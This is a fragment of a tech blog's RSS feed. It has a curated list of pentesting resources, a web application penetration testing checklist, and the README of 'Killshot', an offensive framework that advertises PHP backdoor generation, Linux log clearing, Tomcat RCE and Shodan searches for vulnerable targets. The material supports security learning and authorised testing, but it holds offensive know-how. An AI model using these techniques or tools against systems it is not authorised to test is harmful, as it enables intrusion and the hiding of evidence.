<li><a href="https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7" rel="nofollow">No Tech Hacking by Johnny Long &amp; Jack Wiles, 2008</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470639539.html" rel="nofollow">Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010</a></li>
<li><a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118608577.html" rel="nofollow">Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014</a></li>
<li><a href="https://www.mhprofessional.com/product.php?isbn=0071818464" rel="nofollow">Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014</a></li>
</ul>
<h3><a id="user-content-lock-picking-books" class="anchor" href="https://github.com/enaqx/awesome-pentest#lock-picking-books" aria-hidden="true"></a><strong>Lock Picking Books</strong></h3>
<ul>
<li><a href="https://www.elsevier.com/books/practical-lock-picking/ollam/978-1-59749-989-7" rel="nofollow">Practical Lock Picking by Deviant Ollam, 2012</a></li>
<li><a href="https://www.elsevier.com/books/keys-to-the-kingdom/ollam/978-1-59749-983-5" rel="nofollow">Keys to the Kingdom by Deviant Ollam, 2012</a></li>
<li><a href="https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0" rel="nofollow">Lock Picking: Detail Overkill by Solomon</a></li>
<li><a href="https://www.dropbox.com/sh/k3z4dm4vyyojp3o/AAAIXQuwMmNuCch_StLPUYm-a?dl=0" rel="nofollow">Eddie the Wire books</a></li>
</ul>
<h3><a id="user-content-defcon-suggested-reading" class="anchor" href="https://github.com/enaqx/awesome-pentest#defcon-suggested-reading" aria-hidden="true"></a><strong>Defcon Suggested Reading –&nbsp;Hacking Tools</strong></h3>
<ul>
<li><a href="https://www.defcon.org/html/links/book-list.html" rel="nofollow">Defcon Suggested Reading</a></li>
</ul>
<h2><a id="user-content-vulnerability-databases" class="anchor" href="https://github.com/enaqx/awesome-pentest#vulnerability-databases" aria-hidden="true"></a><strong>Vulnerability Databases –&nbsp;Hacking Tools</strong></h2>
<ul>
<li><a href="https://cve.mitre.org/" rel="nofollow">Common Vulnerabilities and Exposures (CVE)</a>&nbsp;– Dictionary of common names (i.e., CVE Identifiers) for publicly known security vulnerabilities.</li>
<li><a href="https://nvd.nist.gov/" rel="nofollow">National Vulnerability Database (NVD)</a>&nbsp;– United States government’s National Vulnerability Database provides additional meta-data (CPE, CVSS scoring) of the standard CVE List along with a fine-grained search engine.</li>
<li><a href="https://www.kb.cert.org/vuls/" rel="nofollow">US-CERT Vulnerability Notes Database</a>&nbsp;– Summaries, technical details, remediation information, and lists of vendors affected by software vulnerabilities, aggregated by the United States Computer Emergency Response Team (US-CERT).</li>
<li><a href="http://seclists.org/fulldisclosure/" rel="nofollow">Full-Disclosure</a>&nbsp;– Public, vendor-neutral forum for detailed discussion of vulnerabilities, often publishes details before many other sources.</li>
<li><a href="http://www.securityfocus.com/bid/" rel="nofollow">Bugtraq (BID)</a>&nbsp;– Software security bug identification database compiled from submissions to the SecurityFocus mailing&nbsp;Penetration testing tools list and other sources, operated by Symantec, Inc.</li>
<li><a href="https://www.exploit-db.com/" rel="nofollow">Exploit-DB</a>&nbsp;– Non-profit project hosting exploits for software vulnerabilities, provided as a public service by Offensive Security.</li>
<li><a href="https://technet.microsoft.com/en-us/security/bulletins#sec_search" rel="nofollow">Microsoft Security Bulletins</a>&nbsp;– Announcements of security issues discovered in Microsoft software, published by the Microsoft Security Response Center (MSRC).</li>
<li><a href="https://technet.microsoft.com/en-us/security/advisories#APUMA" rel="nofollow">Microsoft Security Advisories</a>&nbsp;– Archive of security advisories impacting Microsoft software.</li>
<li><a href="https://www.mozilla.org/security/advisories/" rel="nofollow">Mozilla Foundation Security Advisories</a>&nbsp;– Archive of security advisories impacting Mozilla software, including the Firefox Web Browser.</li>
<li><a href="https://packetstormsecurity.com/files/" rel="nofollow">Packet Storm</a>&nbsp;– Compendium of exploits, advisories, tools, and other security-related resources aggregated from across the industry.</li>
<li><a href="https://cxsecurity.com/" rel="nofollow">CXSecurity</a>&nbsp;– Archive of published CVE and Bugtraq software vulnerabilities cross-referenced with a Google dork database for discovering the listed vulnerability.</li>
<li><a href="http://www.securiteam.com/" rel="nofollow">SecuriTeam</a>&nbsp;– Independent source of software vulnerability information.</li>
<li><a href="https://www.vulnerability-lab.com/" rel="nofollow">Vulnerability Lab</a>&nbsp;– Open forum for security advisories organized by category of exploit target.</li>
<li><a href="http://zerodayinitiative.com/advisories/published/" rel="nofollow">Zero Day Initiative</a>&nbsp;– Bug bounty program with the publicly accessible archive of published security advisories, operated by TippingPoint.</li>
<li><a href="https://vulners.com/" rel="nofollow">Vulners</a>&nbsp;– Security database of software vulnerabilities.</li>
<li><a href="https://www.0day.today/" rel="nofollow">Inj3ct0r</a>&nbsp;(<a href="http://mvfjfugdwgc5uwho.onion/" rel="nofollow">Onion service</a>) – Exploit marketplace and vulnerability information aggregator.</li>
<li><a href="https://osvdb.org/" rel="nofollow">Open Source Vulnerability Database (OSVDB)</a>&nbsp;– Historical archive of security vulnerabilities in computerized equipment, no longer adding to its vulnerability database as of April, 2016.Hacking Tools</li>
<li><a href="https://hpi-vdb.de/" rel="nofollow">HPI-VDB</a>&nbsp;– Aggregator of cross-referenced software vulnerabilities offering free-of-charge API access, provided by the Hasso-Plattner Institute, Potsdam.Hacking Tools</li>
</ul>
<h2><a id="user-content-security-courses" class="anchor" href="https://github.com/enaqx/awesome-pentest#security-courses" aria-hidden="true"></a><strong>Security Courses –&nbsp;Hacking Tools –&nbsp;Hacking Tools</strong></h2>
<ul>
<li><a href="https://www.offensive-security.com/information-security-training/" rel="nofollow">Offensive Security Training</a>&nbsp;– Training from BackTrack/Kali developers.</li>
<li><a href="http://www.sans.org/" rel="nofollow">SANS Security Training</a>&nbsp;– Computer Security Training &amp; Certification.</li>
<li><a href="http://opensecuritytraining.info/" rel="nofollow">Open Security Training</a>&nbsp;– Training material for computer security classes.</li>
<li><a href="https://trailofbits.github.io/ctf/" rel="nofollow">CTF Field Guide</a>&nbsp;– Everything you need to win your next CTF competition.</li>
<li><a href="http://azcwr.org/" rel="nofollow">ARIZONA CYBER WARFARE RANGE</a>&nbsp;– 24×7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.</li>
<li><a href="http://cybrary.it/" rel="nofollow">Cybrary</a>&nbsp;– Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book ‘Penetration Testing for Highly-Secured Environments’.</li>
<li><a href="http://computersecuritystudent.com/" rel="nofollow">Computer Security Student</a>&nbsp;– Many free tutorials, great for beginners, $10/mo membership unlocks all content.</li>
<li><a href="https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material" rel="nofollow">European Union Agency for Network and Information Security</a>&nbsp;– ENISA Cyber Security Training material.</li>
</ul>
<h2><a id="user-content-information-security-conferences" class="anchor" href="https://github.com/enaqx/awesome-pentest#information-security-conferences" aria-hidden="true"></a><strong>Information Security Conferences –&nbsp;Hacking Tools</strong></h2>
<ul>
<li><a href="https://www.defcon.org/" rel="nofollow">DEF CON</a>&nbsp;– Annual hacker convention in Las Vegas.</li>
<li><a href="http://www.blackhat.com/" rel="nofollow">Black Hat</a>&nbsp;– Annual security conference in Las Vegas.</li>
<li><a href="http://www.securitybsides.com/" rel="nofollow">BSides</a>&nbsp;– Framework for organising and holding security conferences.</li>
<li><a href="https://events.ccc.de/congress/" rel="nofollow">CCC</a>&nbsp;– Annual meeting of the international hacker scene in Germany.</li>
<li><a href="https://www.derbycon.com/" rel="nofollow">DerbyCon</a>&nbsp;– Annual hacker conference based in Louisville.</li>
<li><a href="http://phreaknic.info/" rel="nofollow">PhreakNIC</a>&nbsp;– Technology conference held annually in middle Tennessee.</li>
<li><a href="http://shmoocon.org/" rel="nofollow">ShmooCon</a>&nbsp;– Annual US East coast hacker convention.</li>
<li><a href="http://www.carolinacon.org/" rel="nofollow">CarolinaCon</a>&nbsp;– Infosec conference, held annually in North Carolina.</li>
<li><a href="https://2016.chcon.nz/" rel="nofollow">CHCon</a>&nbsp;– Christchurch Hacker Con, Only South Island of New Zealand hacker con.</li>
<li><a href="http://www.summercon.org/" rel="nofollow">SummerCon</a>&nbsp;– One of the oldest hacker conventions, held during Summer.</li>
<li><a href="https://2016.hack.lu/" rel="nofollow">Hack.lu</a>&nbsp;– Annual conference held in Luxembourg.</li>
<li><a href="https://hackfest.ca/" rel="nofollow">Hackfest</a>&nbsp;– Largest hacking conference in Canada.</li>
<li><a href="https://conference.hitb.org/" rel="nofollow">HITB</a>&nbsp;– Deep-knowledge security conference held in Malaysia and The Netherlands.</li>
<li><a href="https://www.troopers.de/" rel="nofollow">Troopers</a>&nbsp;– Annual international IT Security event with workshops held in Heidelberg, Germany.</li>
<li><a href="http://hack3rcon.org/" rel="nofollow">Hack3rCon</a>&nbsp;– Annual US hacker conference.</li>
<li><a href="http://thotcon.org/" rel="nofollow">ThotCon</a>&nbsp;– Annual US hacker conference held in Chicago.</li>
<li><a href="http://www.layerone.org/" rel="nofollow">LayerOne</a>&nbsp;– Annual US security conference held every spring in Los Angeles.</li>
<li><a href="https://deepsec.net/" rel="nofollow">DeepSec</a>&nbsp;– Security Conference in Vienna, Austria.</li>
<li><a href="http://www.skydogcon.com/" rel="nofollow">SkyDogCon</a>&nbsp;– Technology conference in Nashville.</li>
<li><a href="http://secuinside.com/" rel="nofollow">SECUINSIDE</a>&nbsp;– Security Conference in&nbsp;<a href="https://en.wikipedia.org/wiki/Seoul" rel="nofollow">Seoul</a>.</li>
<li><a href="http://def.camp/" rel="nofollow">DefCamp</a>&nbsp;– Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania.</li>
<li><a href="https://2016.appsecusa.org/" rel="nofollow">AppSecUSA</a>&nbsp;– Annual conference organized by OWASP.</li>
<li><a href="http://brucon.org/" rel="nofollow">BruCON</a>&nbsp;– Annual security conference in Belgium.</li>
<li><a href="http://www.infosecurityeurope.com/" rel="nofollow">Infosecurity Europe</a>&nbsp;– Europe’s number one information security event, held in London, UK.</li>
<li><a href="http://nullcon.net/website/" rel="nofollow">Nullcon</a>&nbsp;– Annual conference in Delhi and Goa, India.</li>
<li><a href="https://www.rsaconference.com/" rel="nofollow">RSA Conference USA</a>&nbsp;– Annual security conference in San Francisco, California, USA.</li>
<li><a href="https://www.swisscyberstorm.com/" rel="nofollow">Swiss Cyber Storm</a>&nbsp;– Annual security conference in Lucerne, Switzerland.</li>
<li><a href="https://www.virusbulletin.com/conference/index" rel="nofollow">Virus Bulletin Conference</a>&nbsp;– Annual conference going to be held in Denver, USA for 2016.</li>
<li><a href="http://www.ekoparty.org/" rel="nofollow">Ekoparty</a>&nbsp;– Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina.</li>
<li><a href="https://44con.com/" rel="nofollow">44Con</a>&nbsp;– Annual Security Conference held in London.</li>
<li><a href="https://www.balccon.org/" rel="nofollow">BalCCon</a>&nbsp;– Balkan Computer Congress, annually held in Novi Sad, Serbia.</li>
<li><a href="http://fsec.foi.hr/" rel="nofollow">FSec</a>&nbsp;– FSec – Croatian Information Security Gathering in Varaždin, Croatia.</li>
</ul>
<h2><a id="user-content-information-security-magazines" class="anchor" href="https://github.com/enaqx/awesome-pentest#information-security-magazines" aria-hidden="true"></a><strong>Information Security Magazines –&nbsp;Hacking Tools</strong></h2>
<ul>
<li><a href="https://www.2600.com/Magazine/DigitalEditions" rel="nofollow">2600: The Hacker Quarterly</a>&nbsp;– American publication about technology and computer “underground.”</li>
<li><a href="http://www.phrack.org/" rel="nofollow">Phrack Magazine</a>&nbsp;– By far the longest running hacker zine.</li>
</ul>
<h2><a id="user-content-awesome-lists" class="anchor" href="https://github.com/enaqx/awesome-pentest#awesome-lists" aria-hidden="true"></a><strong>Awesome Lists – Hacking Tools –</strong></h2>
<ul>
<li><a href="https://gbhackers.com/kalitutorials/">Kali Linux Tools</a> – List of Hacking tools present in Kali Linux.</li>
<li><a href="http://sectools.org/" rel="nofollow">SecTools</a> – Top 125 Network Security Hacking Tools.</li>
<li><a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets">Pentest Cheat Sheets</a>&nbsp;– Awesome Pentest Cheat Sheets.</li>
<li><a href="https://github.com/fffaraz/awesome-cpp">C/C++ Programming</a>&nbsp;– One of the main language for open source security tools.</li>
<li><a href="https://github.com/quozd/awesome-dotnet">.NET Programming</a>&nbsp;– Software framework for Microsoft Windows platform development.</li>
<li><a href="https://github.com/alebcay/awesome-shell">Shell Scripting</a>&nbsp;– Command line frameworks, toolkits, guides and gizmos.</li>
<li><a href="https://github.com/dreikanter/ruby-bookmarks">Ruby Programming by @dreikanter</a>&nbsp;– The de-facto language for writing exploits.</li>
<li><a href="https://github.com/markets/awesome-ruby">Ruby Programming by @markets</a>&nbsp;– The de-facto language for writing exploits.</li>
<li><a href="https://github.com/Sdogruyol/awesome-ruby">Ruby Programming by @Sdogruyol</a>&nbsp;– The de-facto language for writing exploits.</li>
<li><a href="https://github.com/sorrycc/awesome-javascript">JavaScript Programming</a>&nbsp;– In-browser development and scripting.</li>
<li><a href="https://github.com/sindresorhus/awesome-nodejs">Node.js Programming by @sindresorhus</a>&nbsp;– Curated list of delightful Node.js packages and resources.</li>
<li><a href="https://github.com/dloss/python-pentest-tools">Python tools for penetration testers</a>&nbsp;– Lots of pentesting tools are written in Python.</li>
<li><a href="https://github.com/svaksha/pythonidae">Python Programming by @svaksha</a>&nbsp;– General Python programming.</li>
<li><a href="https://github.com/vinta/awesome-python">Python Programming by @vinta</a>&nbsp;– General Python programming.</li>
<li><a href="https://github.com/ashishb/android-security-awesome">Android Security</a>&nbsp;– Collection of Android security-related resources.</li>
<li><a href="https://github.com/bayandin/awesome-awesomeness">Awesome Awesomness</a>&nbsp;– The List of the Lists.</li>
<li><a href="https://github.com/paragonie/awesome-appsec">AppSec</a>&nbsp;– Resources for learning about application security.</li>
<li><a href="https://github.com/apsdehal/awesome-ctf">CTFs</a>&nbsp;– Capture The Flag frameworks, libraries, etc.</li>
<li><a href="https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges">InfoSec § Hacking challenges</a>&nbsp;– Comprehensive directory of CTFs, wargames, hacking challenge websites,Penetration testing tools list practice lab exercises, and more.</li>
<li><a href="https://github.com/carpedm20/awesome-hacking">Hacking</a>&nbsp;– Tutorials, tools, and resources.</li>
<li><a href="https://github.com/paralax/awesome-honeypots">Honeypots</a>&nbsp;– Honeypots, tools, components, and more.</li>
<li><a href="https://github.com/onlurking/awesome-infosec">Infosec</a>&nbsp;– Information security resources for pentesting, forensics, and more.</li>
<li><a href="https://github.com/Cugu/awesome-forensics">Forensics</a>&nbsp;– Free (mostly open source) forensic analysis tools and resources.</li>
<li><a href="https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list/" target="_blank" rel="noopener noreferrer">Malware Analysis</a>&nbsp;– Tools and resources for analysts.</li>
<li><a href="https://github.com/caesar0301/awesome-pcaptools">PCAP Tools</a>&nbsp;– Tools for processing network traffic.</li>
<li><a href="https://github.com/sbilly/awesome-security">Security</a>&nbsp;– Software, libraries, documents, and other resources.</li>
<li><a href="https://github.com/meitar/awesome-lockpicking">Awesome Lockpicking</a>&nbsp;– Awesome guides, tools, and other resources about the security and compromise of locks, safes, and keys.</li>
<li><a href="https://github.com/danielmiessler/SecLists">SecLists</a>&nbsp;– Collection of multiple types of lists used during security assessments.</li>
<li><a href="https://github.com/PaulSec/awesome-sec-talks">Security Talks</a>&nbsp;– Curated list of security conferences.</li>
<li><a href="https://github.com/jivoi/awesome-osint">OSINT</a>&nbsp;– Awesome OSINT list containing great resources.</li>
<li><a href="https://github.com/InQuest/awesome-yara">YARA</a>&nbsp;– YARA rules, tools, and people.</li>
</ul>
<p>The post <a href="http://kostacipo.stream/a-complete-penetration-testing-hacking-tools-list-for-hackers-security-professionals/">A Complete Penetration Testing &#038; Hacking Tools List for Hackers &#038; Security Professionals</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/a-complete-penetration-testing-hacking-tools-list-for-hackers-security-professionals/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Web Application Penetration Testing Checklist – A Detailed Cheat Sheet</title>
		<link>http://kostacipo.stream/web-application-penetration-testing-checklist-a-detailed-cheat-sheet/</link>
					<comments>http://kostacipo.stream/web-application-penetration-testing-checklist-a-detailed-cheat-sheet/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 16 Dec 2020 09:18:22 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[The Web]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[web applications]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1961</guid>

					<description><![CDATA[<p>Web Application Pentesting is a method of identifying, analyzing and Report the vulnerabilities which are existing in the Web application including buffer overflow, input validation, code Execution, Bypass Authentication, SQL Injection, CSRF, Cross-site scripting in the target web Application which is given for Penetration Testing. Repeatable Testing and Conduct a serious method One of the [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/web-application-penetration-testing-checklist-a-detailed-cheat-sheet/">Web Application Penetration Testing Checklist – A Detailed Cheat Sheet</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Web Application Pentesting is a method of identifying, analyzing and Report the vulnerabilities which are existing in the Web application including<strong> buffer overflow, input validation, code Execution, Bypass Authentication, SQL Injection, CSRF, Cross-site scripting</strong> in the target web Application which is given for Penetration Testing.</p>
<p>Repeatable Testing and Conduct a serious method One of the Best Method conduct Web Application Penetration Testing for all kind of web application vulnerabilities.</p>
<h2><strong>Web Application Penetration Testing Checklist</strong></h2>
<h4><strong>Information Gathering</strong></h4>
<p>1. Retrieve and Analyze the robot.txt files by using a tool called GNU Wget.</p>
<p>2. Examine the version of the software. database Details, the error technical component, bugs by the error codes by requesting invalid pages.</p>
<p>3. Implement techniques such as DNS inverse queries, DNS zone Transfers, web-based DNS Searches.</p>
<p>4. Perform Directory style Searching and vulnerability scanning, Probe for URLs, using tools such as <strong><a href="https://nmap.org/">NMAP</a></strong> and <strong>Nessus</strong>.</p>
<p>5. Identify the Entry point of the application using <strong>Burp Proxy</strong>,<strong> OWSAP ZAP, TemperIE, WebscarabTemper Data</strong>.</p>
<p>6. By using traditional Fingerprint Tool such as<strong> Nmap, Amap</strong>, perform TCP/ICMP and service Fingerprinting.</p>
<p>7. By Requesting Common File Extension such as.<strong>ASP,EXE, .HTML, .PHP</strong> ,Test for recognized file types/Extensions/Directories.</p>
<p>8. Examine the Sources code From the Accessing Pages of the Application front end.</p>
<h3><strong>Authentication Testing</strong></h3>
<p>1. Check if it is possible to<strong> “reuse”</strong> the session after Logout.also check if the application automatically logs out a user has idle for a certain amount of time.</p>
<p>2. Check whether any sensitive information&nbsp; Remain Stored stored in browser cache.</p>
<p>3. Check and try to Reset the password, by social engineering crack secretive questions and guessing.</p>
<p>4. Check if the <strong>“Remember my password”</strong> Mechanism is implemented by checking the HTML code of the login page.</p>
<p>5. Check if the hardware devices directly communicate and independently with authentication infrastructure using an additional communication channel.</p>
<p>6. Test <strong>CAPTCHA</strong> for authentication vulnerabilities presented or not.</p>
<p>7. Check whether any weak security <strong>questions/Answer</strong> are presented.</p>
<p>8. A successful SQL injection could lead to the loss of customer trust and attackers can steal phone numbers, addresses, and credit card details. Placing a <strong>web application firewall</strong> can filter out the malicious SQL queries in the traffic.</p>
<h3><strong>Authorization Testing</strong></h3>
<p>1. Test the Role and Privilege Manipulation to Access the Resources.</p>
<p>2. Test For Path Traversal by Performing input Vector Enumeration and analyze the input validation functions presented in the web application.</p>
<p>3. Test for cookie and parameter Tempering using web spider tools.</p>
<p>4. Test for HTTP Request Tempering and check whether to gain illegal access to reserved resources.</p>
<h3><strong>Configuration&nbsp; Management Testing</strong></h3>
<p>1. Check directory and File Enumeration review server and application Documentation. also, check the infrastructure and application admin interfaces.</p>
<p>2. Analyze the Web server banner and Performing network scanning.</p>
<p>3. Check and verify the presence of old Documentation and Backup and referenced files such as source codes, passwords, installation paths.</p>
<p>4. Check and identify the ports associated with the <strong>SSL/TLS</strong> services using <strong>NMAP</strong> and <strong>NESSUS</strong>.</p>
<p>5. Review OPTIONS HTTP method using <strong>Netcat </strong>and <strong>Telnet.</strong></p>
<p>6. Test for HTTP methods and XST for credentials of legitimate users.</p>
<p>7. Perform application configuration management test to review the information of the source code, log files and default Error Codes.</p>
<h3><strong>Session Management Testing</strong></h3>
<p>1. Check the URL’s in the Restricted area to Test for Cross sight Request Forgery.</p>
<p>2. Test for Exposed Session variables by inspecting Encryption and reuse of <strong>session token,&nbsp;Proxies and caching, GET&amp;POST</strong>.</p>
<p>3. Collect a sufficient number of cookie samples and analyze the cookie sample algorithm and forge a valid Cookie in order to perform an Attack.</p>
<p>4. Test the cookie attribute using intercept proxies such as <strong>Burp Proxy, OWASP ZAP</strong>, or traffic intercept proxies such as Temper Data.</p>
<p>5. Test the session Fixation, to avoid seal user session.(session Hijacking )</p>
<h3><strong>Data Validation Testing</strong></h3>
<p>1. Performing Sources code Analyze for javascript Coding Errors.</p>
<p>2. Perform Union Query SQL injection testing, standard SQL injection Testing, blind&nbsp; SQL query Testing, using tools such as <strong>sqlninja,sqldumper,sql power injector</strong> .etc.</p>
<p>3. Analyze the HTML Code, Test for stored XSS, leverage stored XSS, using tools such as<strong> XSS proxy, Backframe, Burp Proxy, OWASP, ZAP, XSS Assistant.</strong></p>
<p>4. Perform <strong>LDAP injection</strong> testing for sensitive information about users and hosts.</p>
<p>5. Perform <strong>IMAP/SMTP injection</strong> Testing for Access the Backend Mail server.</p>
<p>6. Perform<strong> XPATH Injection</strong> Testing for Accessing the confidential information</p>
<p>7. Perform <strong>XML injection</strong> testing to know information about XML Structure.</p>
<p>8. Perform Code injection testing to identify input validation Error.</p>
<p>9. Perform Buffer Overflow testing for Stack and heap memory information and application control flow.</p>
<p>10. Test for HTTP Splitting and smuggling for cookies and HTTP redirect information.</p>
<h3><strong>Denial of Service Testing</strong></h3>
<p>1. Send Any Large number of Requests that perform database operations and observe any Slowdown and&nbsp; New Error Messages.</p>
<p>2.Perform manual source code analysis and submit a range of input varying lengths to the applications</p>
<p>3. Test for SQL wildcard attacks for application information testing. Enterprise Networks should choose the <strong>best DDoS Attack prevention services</strong>&nbsp;to ensure the DDoS attack protection and prevent their network</p>
<p>4. Test for User specifies object allocation whether a maximum number of object that application can handle.</p>
<p>5. Enter Extreme Large number of the input field used by the application as a Loop counter. Protect website from future attacks Also Check your Companies&nbsp;<strong>DDOS Attack Downtime Cost.</strong></p>
<p>6. Use a script to automatically submit an extremely long value for the server can be logged the request.</p>
<p>The post <a href="http://kostacipo.stream/web-application-penetration-testing-checklist-a-detailed-cheat-sheet/">Web Application Penetration Testing Checklist – A Detailed Cheat Sheet</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/web-application-penetration-testing-checklist-a-detailed-cheat-sheet/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Killshot: Penetration Testing Framework</title>
		<link>http://kostacipo.stream/killshot-penetration-testing-framework/</link>
					<comments>http://kostacipo.stream/killshot-penetration-testing-framework/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 25 Nov 2020 18:50:28 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1942</guid>

					<description><![CDATA[<p>KILLSHOT A Penetration Testing Framework, Information gathering tool &#38; Website Vulnerability Scanner Why KillShot ? You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner &#38;&#38; WebApp Vul Scanner [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/killshot-penetration-testing-framework/">Killshot: Penetration Testing Framework</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h1>KILLSHOT</h1>
<p>A Penetration Testing Framework, Information gathering tool &amp; Website Vulnerability Scanner</p>
<p><strong>Why KillShot</strong> ?</p>
<p>You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner &amp;&amp; WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot</p>
<p>This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql</p>
<p><a href="https://user-images.githubusercontent.com/19738278/47605704-7eaab180-d9f9-11e8-97cc-74fad3dc152c.png" target="_blank" rel="noopener noreferrer"><img decoding="async" src="https://user-images.githubusercontent.com/19738278/47605704-7eaab180-d9f9-11e8-97cc-74fad3dc152c.png" alt="killshot-logo_v1"></a></p>
<h1>Help option</h1>
<p><a href="https://user-images.githubusercontent.com/19738278/48301246-f6dda080-e4ea-11e8-9def-5785fce2653a.JPG" target="_blank" rel="noopener noreferrer"><img decoding="async" src="https://user-images.githubusercontent.com/19738278/48301246-f6dda080-e4ea-11e8-9def-5785fce2653a.JPG" alt="help"></a></p>
<h1>Use Shodan By targ option</h1>
<p>CreateAccount Here <a href="https://account.shodan.io/register" rel="nofollow">Register</a> and get Your aip <a href="https://account.shodan.io/" rel="nofollow">Shodan AIP</a> And Add your shodan AIP to aip.txt &lt; only your aip should be show in the aip.txt &gt; Use targ To search about Vulnrable Targets in shodan databases</p>
<p><a href="https://user-images.githubusercontent.com/19738278/48301291-ed086d00-e4eb-11e8-905c-86b9807e3234.JPG" target="_blank" rel="noopener noreferrer"><img decoding="async" src="https://user-images.githubusercontent.com/19738278/48301291-ed086d00-e4eb-11e8-905c-86b9807e3234.JPG" alt="search"></a></p>
<p>Use targ To scan Ip of servers fast with shodan</p>
<p><a href="https://user-images.githubusercontent.com/19738278/48301305-31940880-e4ec-11e8-8a74-35d65b063930.JPG" target="_blank" rel="noopener noreferrer"><img decoding="async" src="https://user-images.githubusercontent.com/19738278/48301305-31940880-e4ec-11e8-8a74-35d65b063930.JPG" alt="scan"></a></p>
<h1>Menu Site</h1>
<pre><code>{0} Spider 
{1} Web technologie 
{2} WebApp Vul Scanner
{3} Port Scanner
{4} CMS Scanner
{5} Fuzzers 
{6} Cms Exploit Scanner
{7} Backdoor Generation
{8} Linux Log Clear
</code></pre>
<h1>WebApp Vul Scanner</h1>
<pre><code>{1} Xss scanner
{2} Sql Scanner
{3} Tomcat RCE
</code></pre>
<h1>Port Scanner</h1>
<pre><code> [0] Nmap Scan
 [1] Unicorn Scan
Nmap Scan 
 [2] Nmap Os Scan 
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan 
 [5] Nmap All scan
 [6] Nmap Http Option Scan 
 [7] Nmap Live target In Network
Unicorn Scan
[8] Services OS 
[9] TCP SYN Scan on a whole network 
[01] UDP scan on the whole network
</code></pre>
<h1>Backdoor Generation</h1>
<pre><code> {1} Generate Shell
 {2} Connect Shell
</code></pre>
<h1>USAGE</h1>
<pre><code>1 ----- Help Command 
[site]  MAKE YOUR TARGET
[help] show this MESSAGE
[exit] show this MESSAGE
2 ------ Site command 
Put your target www.example.com
without the http
</code></pre>
<h1>Linux Setup</h1>
<pre><code>git clone https://github.com/bahaabdelwahed/killshot
cd killshot
ruby setup.rb (if setup show any error just try to install the gems/tool manual )
ruby killshot.rb
</code></pre>
<h1>Windows Setup</h1>
<pre><code>Download ruby for windows ==&gt; https://rubyinstaller.org/downloads/
Download Cmder here       ==&gt; http://cmder.net/
Download Curl For 64/32   ==&gt; https://curl.haxx.se/windows/
Download nmap             ==&gt; https://nmap.org/download.html      
</code><code>
Enjoy !</code></pre>
<p>The post <a href="http://kostacipo.stream/killshot-penetration-testing-framework/">Killshot: Penetration Testing Framework</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/killshot-penetration-testing-framework/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>fsociety: Modular Penetration Testing Framework</title>
		<link>http://kostacipo.stream/1874-2/</link>
					<comments>http://kostacipo.stream/1874-2/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sat, 07 Nov 2020 13:50:47 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Vulnerability Analysis]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1874</guid>

